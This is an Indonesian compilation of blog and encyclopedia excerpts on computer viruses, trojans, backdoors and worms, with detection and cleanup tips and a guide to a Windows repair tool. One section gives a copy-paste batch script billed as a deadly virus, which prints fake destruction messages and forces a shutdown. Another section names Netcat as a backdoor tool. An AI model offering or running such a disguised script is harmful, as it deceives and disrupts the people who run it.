CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:

• Disket, media storage R/W

Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bias melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.

• Jaringan ( LAN, WAN,dsb)

Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.

• WWW (internet)

Sangat mungkin suatu situs sengaja ditanamkan suatu ?virus??? yang akan menginfeksi komputer-komputer yang mengaksesnya.

• Software yang Freeware, Shareware atau bahkan Bajakan

Banyak sekali virus yang sengaja ditanamkan dalam suatu program yang disebarluaskan baik secara gratis, atau trial version.

• Attachment pada email, transfering file

Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan seringkali memiliki ekstensi ganda pada penamaan filenya.

sumber : http://tongkonanku.blogspot.com/2007/11/cara-penyebaran-penangulangan-virus_12.html

TIPS DAN TRIK MEMBASMI VIRUS

1.
Nonaktifkan System Restore.

Fasilitas
System Restore pada Windows berguna untuk mengembalikan konfigurasi
sistem ke konfigurasi sebelumnya. Agar sistem yang telah pulih tidak
kembali rusak, matikan fasilitas ini dengan klik kanan pada My
Computer dan pilih Properties. Lalu pilih tab System Restore dan
centang bagian Turn off System Restore on All Drive.

2.
Matikan proses virus.

Bagaimanapun
caranya, matikan proses virus. Biasanya proses virus memiliki
ikon berupa folder atau dokumen MS Word. Gunakan aplikasi seperti
Process Explorer, Pocket Killbox, Show Kill Process, The Killer
Machine, dan sebagainya.

3.
Pulihkan registry.

Pulihkan
registry yang telah diotak-atik oleh virus. Jika tidak, maka virus
dapat menginfeksi komputer Anda lagi. Gunakan Hijack This, Registry
Cleaner, atau The Killer Machine. Hapus juga entry Scheduled
Task yang dibuat oleh virus jika ada.

4.
Hapus file-file virus.

Gunakan
fasilitas Search pada Windows untuk menemukan file-file virus.

5.
Munculkan file-file yang disembunyikan virus.

Virus
pada umumnya tidak begitu kejam dengan menghapus dokumen-dokumen
kita. Biasanya file-file tersebut hanya disembunyikan. Gunakan
perintah attrib -s -h pada Command Prompt
untuk memunculkannya kembali.

6.
Saran terakhir untuk pencegahan. hati-hatilah saat melakukan transfer
data baik melalui disket, USB Flash Disk, maupun dari jaringan.
Tunjukkan file hidden dan ekstensi file pada Windows Explorer.
Selain itu, jangan mudah tergoda oleh file-file dengan nama yang
menggoyahkan iman

Sidik Jari Virus

Virus,
dan juga file-file lain, ternyata juga memiliki sidik jari. Namanya
adalah CRC32 (Cyclic Redudancy Check). Nilai checksum
untuk CRC ini unik untuk setiap file. Dengan demikian kita dapat
mengenali apakah sebuah file merupakan virus atau bukan melalui CRC
ini. Salah satu contoh antivirus yang menggunakan teknik pengenalan
CRC ini adalah WAV yang bisa diunduh dari virologi.info/download.

sumber : http://finderonly.com/2008/02/27/tips-dan-trik-membasmi-virus/

CIRI-CIRI KOMPUTER YANG TERJANGKIT VIRUS

Berikut salah satu ciri-ciri Komputer Yang Terjangkit Virus :

1. Komputer Anda berjalan lebih lambat dari biasanya.
2. Menu Run, Search disembunyikan oleh virus.
3. CTRL+ALT+DEL tidak bisa digunakan.
4. Regedit dan MSCONFIG di disabled
5. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus.
6. Menu Tools -> Folder Options di Windows EXplorer hilang.
7. Komputer sering berhenti atau tidak merespon.
8. Komputer tiba-tiba restart atau crash dan ini terjadi beberapa menit sekali.
9. Aplikasi komputer tidak berjalan dengan semestinya dan sering error.
10. Muncul File dengan Icon Folder tetapi mempunyai file type .exe
11. Hardisk atau disk drive tidak bisa diakses.
12. Aktivitas print tidak bekerja dengan semestinya.
13. Sering terjadi pesan error yang aneh dan tidak biasanya.
14. Sering terlihat menu atau dialog box yang rusak.
15. Terdapat Duplikasi nama folder di dalam folder tersebut.
16. Komputer selalu mengeluarkan pesan dari mana virus ini berasal.

Jika komputer anda mengalami salah satu ciri-ciri diatas, berarti ada kemungkinan komputer anda terkena virus, segera update antivirus anda dan scan komputer anda
untuk membersihkan virus tersebut.

sumber : http://finderonly.com/2008/12/02/ciri-ciri-komputer-yang-terjangkit-virus/

CARA KERJA VIRUS MENURUT JENISNYA

Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak sistem komputer.
Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,

Berikut Jenis-jenis virus dan cara kerja masing-masing virus :

1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.
Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.

2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan).
Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.

3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).
Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam buku alamat pengguna.

4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk.
Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.

5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain
Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..

6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.

7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel.
Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.

sumber : http://finderonly.com/2008/11/13/cara-kerja-virus-komputer-menurut-jenisnya/

PENDETEKSIAN DAN PEMBERSIHAN TROJAN

Memeriksa Listening Port

Mendeteksi keberadaan Trojan merupakan sebuah tindakan yang agak sulit dilakukan. Cara termudah adalah dengan melihat port-port mana yang terbuka dan sedang berada dalam keadaan "listening", dengan menggunakan utilitas tertentu semacam Netstat. Hal ini dikarenakan banyak Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.

Berikut ini adalah contoh penggunaan utilitas Netstat dalam Windows XP Professional

C:\>netstat -a -b

Active Connections

Proto  Local Address          Foreign Address        State           PID
TCP    windows-xp:epmap       0.0.0.0:0              LISTENING       956
 c:\windows\system32\WS2_32.dll
 C:\WINDOWS\system32\RPCRT4.dll
 c:\windows\system32\rpcss.dll
 C:\WINDOWS\system32\svchost.exe
 -- unknown component(s) --
 [svchost.exe]
TCP    windows-xp:microsoft-ds  0.0.0.0:0              LISTENING       4
 [System]
TCP    windows-xp:50300       0.0.0.0:0              LISTENING       1908
 [oodag.exe]
TCP    windows-xp:1025        0.0.0.0:0              LISTENING       496
 [alg.exe]
TCP    windows-xp:1030        0.0.0.0:0              LISTENING       1252
 [ccApp.exe]
UDP    windows-xp:microsoft-ds  *:*                                    4
 [System]
UDP    windows-xp:4500        *:*                                    724
 [lsass.exe]
UDP    windows-xp:isakmp      *:*                                    724
 [lsass.exe]
UDP    windows-xp:1900        *:*                                    1192
 c:\windows\system32\WS2_32.dll
 c:\windows\system32\ssdpsrv.dll
 C:\WINDOWS\system32\ADVAPI32.dll
 C:\WINDOWS\system32\kernel32.dll
 [svchost.exe]
UDP    windows-xp:ntp         *:*                                    1036
 c:\windows\system32\WS2_32.dll
 c:\windows\system32\w32time.dll
 ntdll.dll
 C:\WINDOWS\system32\kernel32.dll
 [svchost.exe]

Membuat Snapshot

Cara lainnya yang dapat digunakan adalah dengan membuat sebuah "snapshot" terhadap semua berkas program (*.EXE, *.DLL, *.COM, *.VXD, dan lain-lain) dan membandingkannya seiring dengan waktu dengan versi-versi terdahulunya, dalam kondisi komputer tidak terkoneksi ke jaringan. Hal ini dapat dilakukan dengan membuat sebuah checksum terhadap semua berkas program (dengan CRC atau MD5 atau mekanisme lainnya). Karena seringnya Trojan dimasukkan ke dalam direktori di mana sistem operasi berada (\WINDOWS atau \WINNT untuk Windows atau /bin, /usr/bin, /sbin, /usr/sbin dalam keluarga UNIX), maka yang patut dicurigai adalah berkas-berkas yang berada di dalam direktori tersebut. Banyak berkas yang dapat dicurigai, khususnya berkas-berkas program yang memiliki nama yang mirip dengan berkas yang "baik-baik" (seperti "svch0st.exe", dari yang seharusnya "svchost.exe", sebuah berkas yang dijalankan oleh banyak layanan sistem operasi Windows) dapat dicurigai sebagai Trojan Horse.

sumber : http://id.wikipedia.org/wiki/Trojan

BACKDOOR

Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.

Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Salah satu contoh dari pernyataan ini adalah ketika Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).

Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit.

Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat, yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX.

sumber : http://id.wikipedia.org/wiki/Backdoor

JENIS-JENIS TROJAN

Beberapa jenis Trojan yang beredar antara lain adalah:

• Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas Security Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pengguna dengan membuat tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) serta menunggu pengguna untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya digunakan untuk menambah keamanan password dalam sistem operasi Windows NT, tapi disalahgunakan menjadi sebuah program pencuri password.
• Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pengguna dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal tersebut melakukan hal yang serupa (memata-matai pengguna).
• Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kontrol secara penuh terhadap sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.
• DDoS Trojan atau Zombie Trojan: Jenis Trojan ini digunakan untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi terhadap host target.
• Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus.

sumber : http://id.wikipedia.org/wiki/Trojan

CARA PENYEBARAN

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.

Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

sumber : http://id.wikipedia.org/wiki/Trojan

CARA KERJA TROJAN

Cara Kerja

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:

• Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.
• Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.
• Pada umumnya Trojan tidak berbahaya selama pengguna tidak terhubung pada internet atau jaringan. Karena Trojan dikendalikan dari komputer lain (komputer attacker).

sumber : http://id.wikipedia.org/wiki/Trojan

VIRUS WORM

Cacing komputer (Inggris: worm) dalam keamanan komputer, adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer. Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru.

Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.

Beberapa contoh dari worm adalah sebagai berikut:

• ADMw0rm: Worm yang dapat melakukan ekspolitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), dengan melakukan buffer-overflow.
• Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan buffer-overflow.
• LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript).
• Nimda
• SQL-Slammer

sumber : http://id.wikipedia.org/wiki/worm

KODE PEMBUAT VIRUS MELALUI NOTEPAD

Silahkan copas alias copy paste kode dibawah ini di notepad kamu:


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”




Kemudian disimpan dengan nama terserah Kamu diakhiri .bat dan save type all file .
cth nya: Dancokboyo.bat



By:http://downloadgratis34.blogspot.com/2009/08/cara-membuat-virus-mematikan.html?showComment=1266053016547

NAMA-NAMA VIRUS SAAT INI

disini adalah nama-nama virus yang sering menginveksi komputer anda:

1. Fat Avenger
2. Deep Trhoat
3. Crazy Eddie
4. perfume.sorry
5. Die Hard 2
6. Polite
7. Cinderella
8. Kiss of Death
9. Mac Gyver
10. Dave
11. brontok
12. roro-roro
    

Nah, bagaimana meurut anda, nama virus terbaik untuk virus indonesia apa? saya beri nominasi ya.. silahkan dipilih di koment.

1. Rontokbro
2. brontok
3. blue fantasi
4. Lina
5. Lisa
6. geal-geol
7. siluman
8. my project
9. blender
10. batam hacker
11. tati is my love
    
12. VBS

Silahkan pilih nama virus favorit anda. Pilih di koment ya.. boleh menambahkan nama baru kok.

CARA KERJA VIRUS KOMPUTER

Berikut ini adalah penjelasan mengenai cara kerja berbagai
jenis virus komputer :
• File Infector Virus, memiliki kemampuan untuk melekatkan diri
(attach) pada sebuah file, yang biasanya merupakan file
executable. Pada umumnya virus jenis ini tidak menyerang file
data. Namun dewasa ini, sebuah file data atau dokumen lainnya
dapat mengandung kode executable seperti macro, yang dapat
dieksploitasi oleh pencipta virus komputer, worms atau trojan
horse.
• Boot Sector Virus, memodifikasi program yang berada di dalam
boot sector pada DOS-formatted disk. Pada umumnya, sebuah boot
sector virus akan terlebih dahulu mengeksekusi dirinya sendiri
sebelum proses bootup pada PC, sehingga seluruh floppy disk yang
digunakan pada PC tersebut akan terjangkiti pula.
• Multipartite Virus, memiliki fitur dari kedua jenis virus di
atas (baik sebagai file infector mau pun sebagai boot /system
sector virus). Ketika sebuah file yang terinfeksi oleh virus
jenis ini dieksekusi, maka virus akan menjangkiti boot sector
dari hard disk atau partition sector dari komputer tersebut, dan
sebaliknya.
• Macro Virus, menjangkiti program macro dari sebuah file data
atau dokumen (yang biasanya digunakan untuk global setting
seperti template Microsoft Word), sehingga dokumen berikutnya
yang diedit oleh program aplikasi tersebut akan terinfeksi pula
oleh macro yang telah terinfeksi sebelumnya.
• Stealth Virus, bekerja secara residensial (menetap) di dalam
memori dan menyembunyikan perubahan yang telah dilakukannya
terhadap file yang dijangkiti. Hal ini dilakukan dengan
mengambil alih fungsi sistem jika terjadi proses pembacaan. Jika
program lain meminta informasi dari bagian sistem yang telah
dijangkiti virus stealth, maka virus akan memberikan informasi
yang sesuai dengan keadaan sebelum terjangkiti virus, sehingga
seolah-olah sistem berfungsi dalam keadaan baik tanpa gangguan
dari virus komputer.
• Polymorphic Virus, cenderung melakukan perubahan di dalam
kodenya setiap kali mengalami proses replikasi sehingga sulit
untuk dideteksi oleh anti-virus software.
• Companion Virus, bekerja dengan berpura-pura menggantikan file
yang hendak diakses oleh pengguna. Sebagai contoh dalam sistem
operasi DOS, file A.EXE dapat diinfeksi dengan membuat sebuah
file dengan nama A.COM. DOS akan terlebih dahulu akan mencari
file berekstensi COM sebelum file dengan ekstensi EXE. Setelah
A.COM telah dieksekusi, kemudian A.EXE akan dieksekusi pula
sehingga file tersebut terinfeksi pula. Cara lain adalah dengan
menempatkan sebuah file dengan nama yang persis sama pada cabang
lain dari file tree, sehingga bila file palsu ini ditempatkan
secara tepat dan terjadi kesalahan dengan tidak menuliskan path
yang lengkap dalam menjalankan sebuah program, akan berakibat
tereksekusinya file palsu tersebut.
• Tunneling Virus, mencoba untuk mengambil alih interrupt
handlers pada DOS dan BIOS, kemudian meng-install dirinya
sehingga berada ‘di bawah’ program-program lainnya. Dengan ini
virus dapat menghindari hadangan dari program anti virus sejenis
monitors.
• Fast Infectors Virus, tidak hanya menyerang ketika program
target dieksekusi, melainkan juga ketika diakses. Hal ini
bertujuan untuk menumpangi perangkat anti virus sebagai media
penyebaran ketika melakukan pengecekan terhadap file-file di
dalam komputer.
• Slow Infectors Virus, kebalikan dari fast infectors, di mana
virus hanya akan menyebar ketika file-file target diciptakan
atau dimodifikasi. Hal ini bertujuan untuk memperdaya anti virus
sejenis integrity checkers dengan menumpangi proses yang ‘sah’
untuk mengubah sebuah file.
• Armoured Virus, dibuat sedemikian rupa sehingga sulit untuk
peneliti anti-virus dalam mempelajari cara mereka bekerja.

http://hana.blog.binusian.org/2009/03/22/perilaku-dan-dampak-virus-komputer/

Memperbaiki kerusakan Sistem Komputer akibat Virus

Komputer yang pernah terkena virus, malware dan sejenisnya biasanya banyak fitur yang tidak berjalan normal (sistem/windows mengalami kerusakan). Misalnya Task Manager, Run, Command prompt yang tidak bisa berjalan, dan kadang sampai file-file tertentu seperti EXE, COM dan lainnya juga tidak bisa dijalankan.

Kerusakan semacam itu biasanya bisa diperbaiki baik manual, menggunakan CD Windows atau dengan software pihak ketiga.

Jika kita mempunyai CD master windows, dan kerusakan cukup parah, biasanya masih bisa diatasi dengan memanfaatkan fitur Repair (baca : Cara me-repair (memperbaiki) Installasi Windows XP )

Kali ini akan dibahas cara memperbaiki sistem windows yang rusak baik disebabkan oleh malware, virus dan sejenisnya atau sebab lainnya dengan Program System Repair Engineer (SREng).

System Repair Engineer (SREng)

System Repair Engineer (SREng) merupakan sebuah program kecil (kurang dari 2 MB), portable dan gratis (free) yang di kembangkan oleh KZTechs.COM webmaster, Smallfrogs ( telah memperoleh penghargaan Microsoft Most Valuable Professional (MVP) for Windows Shell – di China dari 2004-2008). Program ini ditujukan untuk mendeteksi berbagai permasalahan umum sistem dan kerusakan umum yang biasanya disebabkan oleh virus komputer.

Untuk tingkat ahli (advance), program ini dapat digunakan untuk mendeteksi berbagai permasalahan dan memperbaiki sendiri. Sedangkan untuk pengguna biasa (awam), terdapat fungsi Smart Scan untuk memeriksa komputer dan menghasilkan report (laporan) sehingga disimpan untuk selanjutnya bisa di analisa dan diperiksa oleh orang yang lebih ahli.

Meskipun begitu, terdapat berbagai fitur yang langsung dapat digunakan meski oleh kebanyakan pengguna komputer. Berikut penjelasan beberapa fitur dan fungsinya yang bisa kita manfaatkan.

Boot Items

Menampilkan daftar program atau aplikasi apa saja yang otomatis berjalan ketika windows booting, baik dari registry ( termasuk item yang tersembunyi, UserInit dan lainnya), Folders, Task Scheduled, Services dan Boot.ini. Jika melihat adanya program yang aneh (mencurigakan), maka kita bisa menon-aktifkannya dengan cara menghilangkan tanda cek-nya.

Setelah di dihilangkan tanda cek, maka klik tombol Refresh, untuk memastikan bahwa pengubahan telah tersimpan. Jika ternyata tanda cek kembali muncul atau muncul daftar baru dengan nama yang lain, merupakan indikasi kuat bahwa komputer sedang terinfeksi virus atau malware lainnya ( sebaiknya komputer/hardisk di scan baik dengan Bootable CD, virus scanner portable, atau memindah Hardisk di komputer lain dan discan dari sana).

System Repair

Di menu ini ada beberapa fungsi terpisah, diantaranya adalah :

File Association

Menampilkan status ekstensi file-file umum seperti : .TXT, .EXE, .COM, .PIF, .REG, .BAT, .SCR, .CHM, .VBS dan lainnya. Jika Status tidak menunjukkan “Normal” atau kita tidak bisa menjalankan file dengan salah satu ekstensi tersebut, maka kita bisa memperbaiki dengan memilih ekstensi file yang bermasalah dan klik Repair.

Windows Shell/IE

Di bagian ini, kita akan melihat daftar-daftar pengaturan windows (setting) yang biasanya diubah/dirusak oleh virus, seperti :

• Menu Start/Run tidak aktif
• Registry Editor (regedit.exe) tidak bisa dibuka
• Command Prompt, wallpaper, Control Panel tidak bisa diakses.
• Drive di My Computer tidak terlihat
• Tombol Log off tidak muncul
• Menu “file” di windows Explorer tidak tampil
• Icon di desktop tidak tampil
• Folder Options tidak bisa diaktifkan
• Tombol search (pencarian) tidak tampil
• Windows Explorer atau system tray tidak bisa di klik kanan
• Untuk menampilkan files yang tersembunyi (Hidden files)
• Berbagai tampilan menu di Internet Explorer yang tidak muncul
• berbagai pengaturan lainnya

Untuk memperbaiki setting diatas, pilih dari daftar yang ada dan klik Repair.

Browser Add-ons

Menampilkan daftar plugins/add-ons (fitur tambahan) yang berjalan dengan web browser yang digunakan. Kita dapat melihat informasi detail, menyembunyikan atau menghapus add-on yang tidak diinginkan.

HOSTS File

Hosts file merupakan daftar host name dan mapping alamat IP. Misalnya terdapat baris sebagai berikut :

127.0.0.1 localhost

Berarti ketika kita mengetikkan localhost di web browser akan di mapping ke alamat IP 127.0.0.1. Untuk informasi selengkapnya bisa melihat http://support.microsoft.com/?id=108295

File ini bisa diubah oleh spyware atau malware agar ketika menulis alamat web tertentu sebenarnya dialihkan ke alamat IP yang tidak benar.

Winsock Provider

Akan menampilkan daftar Windows Socket API (Winsock), yang menangani masalah akses jaringan, terutama TCP/IP.

Di menu ini terdapat fitur “Reset All to default values”, yang dapat dimanfaatkan jika koneksi internet tidak bisa berjalan seperti sebelumnya (bermasalah) atau ketika tiba-tiba kita tidak bisa browsing, mengirim email atau operasi jaringan lainnya, padahal koneksi internet berjalan normal.

